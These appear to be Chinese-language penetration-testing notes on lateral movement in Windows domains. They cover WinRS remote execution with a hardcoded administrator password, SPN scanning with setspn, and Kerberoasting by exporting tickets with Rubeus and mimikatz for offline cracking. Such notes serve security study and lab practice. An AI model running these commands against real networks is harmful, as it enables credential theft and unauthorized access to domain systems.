内网安全-横向移动Kerberos 攻击SPN 扫描WinRMWinRSRDP
1.WinRM&WinRS
条件:
双方开启winrm winrs服务
2008版本以上默认开启,win 7默认关闭
检测使用cs内置端口扫描5985开放情况
进行连接
winrs -r:http://192.168.93.30:5985 -u:administrator -p:Whoami2021 whoami
2.内网-spn
shell setspn -T god.org -q */*
探测主机
rc4可以被逆向aes256不可
3.kerbercast攻击条件:
使用rc4进行加密类型票据,工具Rubeus检测或者看加密类型
1.扫描:
shell setspn -T god.org -q */*
2.使用工具检测
Rubeus kerbercast
3.使用手工进行判断请求
使用klist查看
使用mimkaz进行导出和查看
导出
kerberos::list /export
使用脚本进行破解
原文地址:https://blog.csdn.net/weixin_55885866/article/details/146370555
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mrgr.cn/news/95181.html 如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mrgr.cn/news/95181.html 如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!